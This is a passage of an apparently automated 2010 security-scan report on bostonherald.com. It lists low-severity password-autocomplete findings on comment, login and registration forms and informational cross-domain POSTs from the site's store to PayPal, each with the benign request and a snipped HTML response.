Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 85702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.20. http://bostonherald.com/sports/football/patriots/view.bg  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 71939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.23. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:36:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:55:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.26. http://bostonherald.com/users/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:30 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<hr class="userSep" />

<form name="register" action="/users/login?returnto=/users/" method="POST">

<div style="width:350px; margin:40px auto; ">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" style="width:340px;"/></div>
...[SNIP]...

6.27. http://bostonherald.com/users/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/register HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:32:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 09:32:27 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6.28. http://bostonherald.com/users/register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:51 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

7. Cross-domain POST  previous  next
There are 20 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


7.1. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://multimedia.heraldinteractive.com/images/galleries/front_11052008.jpg" width="104" height="112">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.2. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/20100120.jpg" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.3. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

